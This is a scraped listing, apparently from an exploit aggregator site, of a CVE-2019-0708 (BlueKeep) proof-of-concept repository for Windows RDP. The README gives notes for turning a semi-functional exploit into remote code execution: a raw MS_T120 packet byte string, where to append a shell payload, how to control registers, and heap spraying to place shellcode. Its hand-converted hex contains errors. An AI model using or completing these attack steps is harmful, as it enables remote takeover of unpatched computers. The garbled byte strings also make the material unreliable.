来源

关联漏洞

描述

CVE-2019-0708-PoC It is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability, this repository also contains notes on how to complete the attack.

介绍

# CVE-2019-0708-PoC
CVE-2019-0708-PoC It is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability, this repository also contains notes on how to complete the attack.

CVE-2019-0708-PoC:
We are working for a fully functional exploit,
here there are pseudocodes and notes.
"\x03\x00\x00\x0c\x02\xf0\x808\x00\x06MS_T120\x00\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
adding payloads isn’t very hard. You have to make the payload though, mine won’t be shared.
All you have to do is find the correct spot.
'tls.sendall(“payloadhex”)'.
First code is "\x03\x00\x00\x0c\x02\xf0\x808\x00\x06" i think it's "0300000c02f080380006",
as in "dep": "0300000c02f080380006",
next is MS_T120 - it's "4d535f5431323000000000",
so the first part must be "030000c02f0803800064d535f5431323000000000$YourShell",
find the correct spot in the heap memory pool.
It's not insanely difficult, if you've exploited buffer overflows 
then just do the same thing here, (sort of).
Run a debugger on the RDP machine to watch the memory pool. 
Setting the value of ECX to a actual memory address instead of "AAAAAAAAAAA",
will allow you to control the space of EAX,
where the shellcode needs to land,
achieved by heap spraying.

文件快照

 [4.0K]  /data/pocs/db52faad9a1398e8705411e2fa875f8a0f555e0b
├── [ 17K]  exp.py
├── [ 20K]  poc.py
├── [1.2K]  README.md
└── [ 163]  setup.sh

0 directories, 4 files

备注